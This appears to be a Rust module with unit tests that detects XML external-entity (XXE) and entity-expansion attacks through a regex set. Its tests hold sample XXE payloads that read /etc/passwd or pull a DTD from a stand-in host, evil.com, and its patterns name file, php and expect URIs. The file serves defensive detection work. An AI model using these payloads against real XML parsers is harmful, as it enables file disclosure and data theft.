use std::sync::OnceLock;
use regex::RegexSet;
/// Process-wide cache for the compiled XXE detection `RegexSet`.
/// It starts empty and is populated by `patterns()` through `get_or_init`.
static XXE_PATTERNS: OnceLock<RegexSet> = OnceLock::new();
/// Human-readable finding descriptions returned by `check_xxe`.
///
/// `check_xxe` looks an entry up by the index of the matching regex, so the
/// order here must stay aligned with the order of the expressions compiled in
/// `patterns()`.
static XXE_DESCRIPTIONS: &[&str] = &[
"XXE: DOCTYPE with ENTITY declaration",
"XXE: SYSTEM keyword in entity",
// NOTE(review): the regex at this index also matches https://, ftp://,
// php:// and expect:// URIs, not only the two schemes named in this text.
"XXE: ENTITY with file:// or http:// URI",
"XXE: Parameter entity (% entity)",
"XML billion laughs / entity expansion DoS",
"XXE: PUBLIC keyword in entity",
];
/// Returns the shared XXE `RegexSet`, compiling it the first time it is needed.
///
/// The expressions are listed in the same order as `XXE_DESCRIPTIONS`, because
/// `check_xxe` uses the index of a matching expression to pick its description.
///
/// # Panics
///
/// Panics if any of the hard-coded expressions fails to compile.
fn patterns() -> &'static RegexSet {
    /// Compiles the fixed list of detection expressions into one set.
    fn build() -> RegexSet {
        const SOURCES: [&str; 6] = [
            r"(?i)<!DOCTYPE\s+[^>]*\bENTITY\b",
            r"(?i)<!ENTITY\s+[^>]*\bSYSTEM\b",
            r#"(?i)<!ENTITY\s+[^>]*(file://|https?://|ftp://|php://|expect://)"#,
            r"(?i)<!ENTITY\s+%\s+\w+",
            r#"(?i)<!ENTITY\s+\w+\s+['"](&\w+;){2,}"#,
            r"(?i)<!ENTITY\s+[^>]*\bPUBLIC\b",
        ];
        RegexSet::new(SOURCES).expect("XXE regex patterns must compile")
    }

    XXE_PATTERNS.get_or_init(build)
}
/// Scans `input` for XML external-entity (XXE) and entity-expansion markers.
///
/// Returns `Some(description)` when at least one expression from `patterns()`
/// matches. The description is the `XXE_DESCRIPTIONS` entry at the index of the
/// first match reported by the set, or the generic `"XXE injection"` text if no
/// entry exists at that index. Returns `None` when nothing matches.
pub fn check_xxe(input: &str) -> Option<String> {
    patterns()
        .matches(input)
        .into_iter()
        // Only the first reported match is used, so there is no need to
        // collect every matching index into a Vec first.
        .next()
        .map(|idx| {
            XXE_DESCRIPTIONS
                .get(idx)
                .copied()
                .unwrap_or("XXE injection")
                .to_string()
        })
}
#[cfg(test)]
mod tests {
    use super::*;

    /// Asserts that `payload` is flagged and reported with exactly `expected`.
    fn assert_reported_as(payload: &str, expected: &str) {
        assert_eq!(check_xxe(payload).as_deref(), Some(expected));
    }

    // The payloads in the next four tests are wrapped in a DOCTYPE, so they
    // all trip the "DOCTYPE with ENTITY" expression as well. They prove that
    // realistic attacks are caught, but not that the later expressions work.
    // The `reports_*` tests further down cover each expression in isolation.

    #[test]
    fn detects_basic_xxe() {
        let payload =
            r#"<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn detects_http_xxe() {
        let payload = r#"<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com/steal">]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn detects_parameter_entity() {
        let payload = r#"<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/evil.dtd">%xxe;]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn detects_billion_laughs() {
        let payload = r#"<!DOCTYPE lol [<!ENTITY lol1 "&lol;&lol;&lol;">]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn reports_doctype_with_entity() {
        assert_reported_as(
            r#"<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>"#,
            "XXE: DOCTYPE with ENTITY declaration",
        );
    }

    #[test]
    fn reports_system_entity_without_doctype() {
        assert_reported_as(
            r#"<!ENTITY xxe SYSTEM "file:///etc/passwd">"#,
            "XXE: SYSTEM keyword in entity",
        );
    }

    #[test]
    fn reports_uri_entity_without_system_keyword() {
        // PUBLIC also matches a later expression; the URI expression comes
        // first in the set, so its description is the one reported.
        assert_reported_as(
            r#"<!ENTITY xxe PUBLIC "any_text" "http://evil.com/evil.dtd">"#,
            "XXE: ENTITY with file:// or http:// URI",
        );
    }

    #[test]
    fn reports_parameter_entity_without_doctype() {
        assert_reported_as(
            r#"<!ENTITY % common "(#PCDATA)">"#,
            "XXE: Parameter entity (% entity)",
        );
    }

    #[test]
    fn reports_entity_expansion_without_doctype() {
        assert_reported_as(
            r#"<!ENTITY lol1 "&lol;&lol;&lol;">"#,
            "XML billion laughs / entity expansion DoS",
        );
    }

    #[test]
    fn reports_public_entity() {
        assert_reported_as(
            r#"<!ENTITY xxe PUBLIC "any_text" "data.ent">"#,
            "XXE: PUBLIC keyword in entity",
        );
    }

    #[test]
    fn allows_normal_xml() {
        assert!(check_xxe("<root><item>hello</item></root>").is_none());
        assert!(check_xxe(r#"<?xml version="1.0"?><data/>"#).is_none());
    }

    #[test]
    fn allows_normal_text() {
        assert!(check_xxe("This is a normal comment").is_none());
    }
}